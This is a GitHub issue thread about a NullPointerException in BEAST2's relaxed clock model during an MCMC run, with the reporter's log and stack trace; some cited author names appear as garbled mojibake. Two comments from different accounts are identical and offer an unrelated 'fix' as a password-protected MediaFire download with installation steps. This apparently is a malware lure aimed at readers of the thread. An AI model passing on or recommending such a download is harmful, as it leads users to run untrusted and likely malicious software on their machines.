### ISSUE TITLE
java.lang.NullPointerException: Cannot invoke "beast.base.evolution.tree.Node.isRoot()" because "<parameter1>" is null

### ISSUE THREAD

**Issue by liamxg** [CompEvol/beast2#1162]
Dear @alexeid,

please see below:

```
Starting frequencies: [0.25, 0.25, 0.25, 0.25]
MultiGammaSiteModel is java-only -- unless you use MGSMBeagleTreeLikelihood
  UCRelaxedClockModel: using 1362 rate categories to approximate rate distribution across branches.
NetworkLikelihood(NetworkLikelihood) uses BeerNetworkLikelihood4
  Alignment(aligned_seq682): [taxa, patterns, sites] = [682, 3285, 30119]
===============================================================================
Citations for this model:

Bouckaert, Remco, Timothy G. Vaughan, Joￃﾫlle Barido-Sottani, Sebastiￃﾡn Duchￃﾪne, Mathieu Fourment, 
Alexandra Gavryushkina, Joseph Heled, Graham Jones, Denise Kￃﾼhnert, Nicola De Maio, Michael Matschiner, 
Fￃﾡbio K. Mendes, Nicola F. Mￃﾼller, Huw A. Ogilvie, Louis du Plessis, Alex Popinga, Andrew Rambaut, 
David Rasmussen, Igor Siveroni, Marc A. Suchard, Chieh-Hsi Wu, Dong Xie, Chi Zhang, Tanja Stadler, 
Alexei J. Drummond 
  BEAST 2.5: An advanced software platform for Bayesian evolutionary analysis. 
  PLoS computational biology 15, no. 4 (2019): e1006650.

Drummond AJ, Ho SYW, Phillips MJ, Rambaut A (2006) Relaxed Phylogenetics and
  Dating with Confidence. PLoS Biol 4(5): e88

Douglas J, Zhang R, Bouckaert R. Adaptive dating and fast proposals: Revisiting the phylogenetic relaxed clock model. PLoS computational biology. 2021 Feb 2;17(2):e1008322.

===============================================================================
java.lang.NullPointerException: Cannot invoke "beast.base.evolution.tree.Node.isRoot()" because "<parameter1>" is null
	at beast.base.evolution.branchratemodel.UCRelaxedClockModel.getRateForBranch(Unknown Source)
	at recombination.likelihood.NetworkLikelihood.getLengthMatrix(Unknown Source)
	at recombination.likelihood.NetworkLikelihood.getCoalChildren(Unknown Source)
	at recombination.likelihood.NetworkLikelihood.calculateLogP(Unknown Source)
	at beast.base.inference.CompoundDistribution.calculateLogP(Unknown Source)
	at beast.base.inference.CompoundDistribution.calculateLogP(Unknown Source)
	at beast.base.inference.State.robustlyCalcPosterior(Unknown Source)
	at beast.base.inference.MCMC.run(Unknown Source)
	at beastfx.app.beast.BeastMCMC.run(Unknown Source)
	at beastfx.app.beast.Controller$2.run(Unknown Source)
```

Best,
Liam

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
